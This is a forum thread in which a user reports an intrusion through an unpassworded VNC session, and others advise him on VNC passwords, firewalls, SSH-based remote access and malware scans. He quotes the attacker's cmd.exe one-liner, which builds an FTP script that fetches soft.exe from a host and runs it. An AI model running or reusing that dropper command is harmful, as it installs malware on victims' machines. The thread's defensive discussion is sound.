I think i got hacked! :S

[Dev'olution]

Code:

%systemroot%\system32\cmd.exe
cmd /c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik &echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe &exit

%systemroot%\system32\cmd.exe
cmd /c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik &echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe &exit

Got hell freaked out.

My machine started beeping like hell... then i look at it and it's typing stuff into my console!!!

I had VNC open with no password, but no ports are forwarded and i need to use VNC on my network. What should i do? Change my VNC password? How could they get in with no ports forwarded?

[MaxIBoy]

Looks like someone is trying to execute Windows shellcode on your system.

On Ubuntu, you aren't in any danger from that, but I suggest disconnecting VNC ASAP.

[Dev'olution]

Also, is there a chance that my windows machines may have been affected?

[Copernicus1234]

soft.exe is malware. Do you have a windows machine in your network? Its probably infected by this malware and it tried to spread to your ubuntu machine.

maxiBoy: I dont see any shellcode?

[Dev'olution]

I have a home PC, which is pretty much used 24/7 but doesnt have VNC... my other server does tho.

[doas777]

Looks like someone is trying to execute Windows shellcode on your system.

On Ubuntu, you aren't in any danger from that, but I suggest disconnecting VNC ASAP.

that it does. lol.

if you need secure remote access look into freenx (ssh-based, easy setup and is a good protocol).
https://help.ubuntu.com/community/FreeNX

[Dev'olution]

While i'm at it, is there an easy way to configure my firewall on the machine. ala GUI?

[MaxIBoy]

On your windows machine, all the firewalls in the world won't save you if you continue using unsecured VNC. Does your router have a firewall? It would be advisable to enable that instead (assuming the computers connected by VNC are both within the same LAN and behind the same router.) That possibly would secure you, since the entire VNC is behind a firewall. But no guarantees, you should use a password on VNC from now on anyway.

On the windows machine, you should download this free tool and run a full check. This tool is really great, I've used it on horribly screwed up school computers before, to get them back on their feet. No substitute for a full antivirus program but it's good for catching "that bug going around."

soft.exe is malware. Do you have a windows machine in your network? Its probably infected by this malware and it tried to spread to your ubuntu machine.

maxiBoy: I dont see any shellcode?

Doesn't shellcode just mean "code that runs under the CLI shell?" In this case cmd.exe.

[Dev'olution]

Thanks Maxiboy, I used Malwarebytes at my old work (Service and Support), just never had any real experience with VNC!

[credobyte]

http://personalfirewall.comodo.com/ - haven't found a better one.